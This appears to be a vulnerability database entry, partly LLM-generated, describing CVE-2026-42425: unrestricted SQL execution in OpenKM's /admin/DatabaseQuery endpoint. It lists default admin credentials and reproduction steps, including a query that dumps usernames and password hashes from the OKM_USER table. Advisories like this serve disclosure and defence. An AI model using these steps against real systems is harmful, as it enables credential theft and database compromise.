CVE-2026-42425
Description
OpenKM 6.3.12 contains an unrestricted SQL execution vulnerability that allows authenticated administrative users to execute arbitrary SQL statements against the application database via the DatabaseQuery interface. Attackers can submit malicious SQL queries through the qs parameter to the /admin/DatabaseQuery endpoint to extract sensitive data including usernames and password hashes from the OKM_USER table, modify permissions, or delete database records.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
OpenKM 6.3.12 has an unrestricted SQL execution vulnerability in the admin DatabaseQuery interface allowing authenticated admins to extract data, modify permissions, or delete records.
Vulnerability
OpenKM 6.3.12 (Community Edition) and 7.1.47 (Pro Edition) and previous versions contain an unrestricted SQL execution vulnerability in the /admin/DatabaseQuery endpoint [1][2][3]. Authenticated administrative users can supply arbitrary SQL statements through the qs parameter [1]. This allows the execution of any SQL command against the application database [3]. The vulnerability is present in the administrative interface and does not require any special configuration beyond default admin privileges [1].
Exploitation
An attacker needs valid administrative credentials to access the /admin/DatabaseQuery interface [1][3]. Using the qs parameter, they can craft SQL queries to extract, modify, or delete database records [1][2]. For example, a query can retrieve usernames and password hashes from the OKM_USER table [1]. The exploit can be performed via a simple HTTP POST request with the malicious SQL payload [1]. No additional user interaction or race condition is required [1][3].
Impact
Successful exploitation leads to full compromise of the database [3]. An attacker can extract sensitive information including usernames and password hashes, modify permissions, and delete records [1][3]. This can be chained with other vulnerabilities (e.g., RCE via BeanShell) to achieve complete system takeover [2][3]. The impact is severe as the database contains all application data, including documents metadata and user credentials [3].
Mitigation
As of the publication date, no official vendor patch is available [3]. Affected versions include OpenKM Community Edition 6.3.12 and OpenKM Pro Edition 7.1.47 and earlier [1][2]. Until a fix is released, organizations should restrict access to administrative interfaces via network segmentation, enforce strong authentication, and monitor logs for suspicious SQL queries [3]. The vendor's website (openkm.com) provides general contact information but no security advisory [4].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The administrative DatabaseQuery interface executes user-supplied SQL statements against the backend database without any restriction, sanitization, or access control beyond basic authentication."
Attack vector
An attacker must first authenticate as an administrative user (e.g., via default credentials `okmAdmin`/`admin` or compromised credentials) [ref_id=1]. Once authenticated, the attacker navigates to Administration → Database Query, selects JDBC as the query type, and submits arbitrary SQL statements through the `qs` parameter to the `/admin/DatabaseQuery` endpoint [ref_id=1][ref_id=2]. The application passes these queries directly to the backend database without any filtering, allowing extraction of password hashes from the `OKM_USER` table, modification of permissions, or deletion of records [ref_id=1][ref_id=2].
Affected code
The vulnerability exists in the administrative DatabaseQuery interface exposed at the `/admin/DatabaseQuery` endpoint [ref_id=1]. The affected code is the JDBC query handler that accepts user-supplied SQL statements via the `qs` parameter without any restriction or sanitization [ref_id=1][ref_id=2]. No patch files are available in the bundle.
What the fix does
The bundle states that at the time of publication of the Terra System Labs research, "no official vendor patch was available" for this vulnerability [ref_id=1][ref_id=2]. The advisory recommends applying compensating controls immediately, such as restricting network access to the administrative interface, enforcing strong authentication, and monitoring vendor advisories for future patches [ref_id=1]. Without a patch, organizations must rely on access control and network segmentation to mitigate the risk.
Preconditions
- authAttacker must have valid administrative credentials for the OpenKM application (e.g., default okmAdmin/admin or compromised credentials)
- networkNetwork access to the OpenKM web interface (typically port 8081)
- configThe /admin/DatabaseQuery endpoint must be exposed and accessible
- inputAttacker submits malicious SQL via the qs parameter
Reproduction
1. Log in to OpenKM with administrative credentials (e.g., `okmAdmin`/`admin`). 2. Navigate to Administration → Database Query. 3. Select query type as JDBC. 4. Execute SQL queries directly against the backend database, for example: `SELECT USR_ID, USR_PASSWORD FROM OKM_USER;` [ref_id=1]. 5. The results are displayed in the application interface, exposing sensitive data such as password hashes [ref_id=1].
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
7- github.com/terrasystemlabs/Exploits/tree/main/OpenKM-Exploitsnvd
- github.com/terrasystemlabs/Exploits/tree/main/OpenKM-Exploits/nuclei-templates/openkm-sql-database-querynvd
- hub.docker.com/r/openkm/openkm-cenvd
- terrasystemlabs.com/postnvd
- www.exploit-db.com/exploits/52520nvd
- www.openkm.comnvd
- www.vulncheck.com/advisories/openkm-unrestricted-sql-execution-via-databasequerynvd
News mentions
0No linked articles in our index yet.